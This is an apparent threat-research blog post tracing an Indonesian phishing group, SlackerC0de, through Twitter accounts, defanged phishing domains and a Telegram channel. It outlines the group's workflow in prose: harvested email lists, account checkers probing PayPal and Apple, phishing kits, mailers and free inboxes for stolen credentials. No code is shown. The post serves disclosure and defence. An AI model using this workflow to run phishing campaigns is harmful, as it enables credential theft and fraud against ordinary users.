Twitter Activity

From this point on we had only the now-blocked websites left to go over. However, since the activity traces back to Twitter, we could hunt for anyone spreading these links and look for new activity, or perhaps even find out who is behind this, all because the attacker chose to use a shortened link.

We were able to identify the following accounts, which appear to be based out of Indonesia:
All of these accounts were using the same method and similar links. The original link from the screenshot could be found being spread by @uboldmild.
Tweet of the original link.

As an elementary step of an investigation like this we checked for the usernames and names left by these individuals.

The Twitter user "Donna Curry" was registered under the handle 'uboldmild'. Pivoting on the handle with a simple search engine query, we found it connected to numerous phishing websites following the same scheme, registered under the email

Websites such as :
  • step-verivy[.]com
  • app-recoveryicloud[.]com
  • data-recoveryicloud[.]com
  • idmsa-accounts-security[.]com
  • datarecoveryicloud[.]com
  • com-verifyaccountappstore[.]info
  • responsibilitiesmacintosh[.]com
By looking at the Twitter account we can further correlate this by looking at what sort of links have been tweeted out by the user:

What looks like the first tweet was made in June 2017 to test how the link shortener works.
This shows that while the phishing kits they used may have evolved over the past year, the initial weaponization point, Twitter's link shortener, has not.

When checking the rest of the users, we found that @StyleC0de has been doing the same, as can be seen through his Twitter account as well. However, he has done so under his actual name, which can be traced back to numerous social media profiles under that name, including a YouTube video showing a script he intended to sell in 2017:

His latest campaign, which was still live as we were writing this post, is the one we showed above under his still-current username and calling card 'StyleC0de'.

SlackerC0de spam group

SlackerC0de is an Indonesian hacking group that became active around 2015 with various low-level scripts aimed at financial scams.

When we checked the user @nugslackerc0de from Twitter, his username stood out as well. This was what led us to the Indonesian group which can be found at - and this group might actually prove to be the potential connection point between these Indonesian users.

An Apple account checker script shared on Pastebin.

The main name that kept popping up at various source codes belonging to the group was a ‘Malhadi Jr.’ with websites like hosting online tools like email bots and account checkers. Along with even an old personal Github account - sharing similar repositories.

We managed to see that one of his tools was used for a phishing website last year with a similar URL.

Source: ServiceHostNet

Considering our recent findings, it indeed seemed to us that the SlackerC0de group was the key to identifying the common points between the different users.

Slackerc0de themselves invite any prying eyes to a public group on Telegram where they share their tools of the trade.

When we peeked inside the group, we were able to see behind the scenes of a relatively close knit group collaborating in phishing efforts, like this user asking what a good subject for Yahoo email recipients is:

A now deleted user instructing another member on his preferred link shorteners like Twitter and Owly:

And another one sharing PayPal Phishing Kit’s source code for download:

A user sharing a screenshot of using a mailer with their Apple phishing website present in the background:

We can see this Indonesian group is active with focused efforts in cheating people out of their money, adding insult to injury with boasting their success while sharing screenshots of incoming credentials:

An attacker sharing his harvested credentials.
Tactics, Techniques, and Procedures

This group and those like it operate by first gathering email lists, either curated manually or downloaded from the various cybercrime forums online. Once they have a large enough list, they move on to checking the emails for corresponding accounts: they feed the addresses into account checkers made by the likes of Malhadi Jr from SlackerC0de, which use various API calls to PayPal and Apple and inspect the responses to see which addresses have accounts there. Both companies seem to be their favorite targets.

Once they have amassed a large enough list of validated targets, the attackers build the phishing infrastructure for the most crucial steps of their campaign. Judging by how this specific group operates, they create a website, mostly hosted with Amazon, Google, or Aruba (the same company used as the fake receipt's merchant in one of their emails), host their phishing kit there, and start mass-emailing their list using mailer software bought from their closed forum marketplace or shared by somebody in the chat group.

To receive the credentials they steal, they set up an inbox on a free email service such as Yandex. Not much skill is needed to run such a scheme: they only need to configure the kit's source code with their email address, upload it to a server, and use an email template. Going over their correspondence, we saw users with no skill whatsoever asking for resources, more experienced users sharing them, and the backbone of these groups, the tool creators and sellers, supplying the 955 members of the group with easy means of creating their own campaigns.

We saw them share the various setbacks they hit after launching a campaign, such as Amazon blocking their accounts, botching the %email field, failing to configure a server, and more. Even an attacker at the lowest level of skill is spoon-fed the answer to his mistake and how to correct it so the campaign works, with dire consequences for the victims of this criminal crowdsourcing.
An attacker sharing a screen capture of his Phishing email.

An attacker sharing a screenshot in hopes of troubleshooting an error.

An attacker sharing a screenshot of his blocked Amazon account.

Historical Observations

We then tried to look for historical correlation and past activity this group may have been connected to, so we started looking through RecordedFuture’s threat intelligence platform for further relationships and activity.
When we initially looked at the main domain - we were looking for what malware RecordedFuture may have seen connected to SlackerC0de[.]us, if any at all. In this case we were able to see that some ransomware activity and various intertwined domains were connected to SlackerC0de[.]us.

Source: RecordedFuture
So we continued to look for connected phishing campaigns, and saw that prior to the July 2018 PayPal and Apple campaign that started our investigation, the group ran earlier campaigns in January - mainly targeting Apple and Facebook users.

Source: RecordedFuture
Meaning this group is probably constantly busy all year round targeting all the varied popular services in efforts of scamming people out of their money and credentials.




DeepEnd Research has already notified Apple and PayPal of these findings prior to the publication of this post.

7/27 - Update:

Since the publication of our blog post, the Twitter accounts we found, along with the associated YouTube account, have been suspended from their respective platforms.
During this time we were also continuing to monitor for any renewed activity by any new users possibly using the same methods outlined in this campaign, since the identified ones were suspended.
We managed to find that there is currently one newly registered Twitter user still using the same construct of various shortened links leading to PayPal login phishing pages:

This user is registered under the name 'Tanya D Campero' - 

The links tweeted out by this user lead us to the following new websites and infrastructure used by this campaign: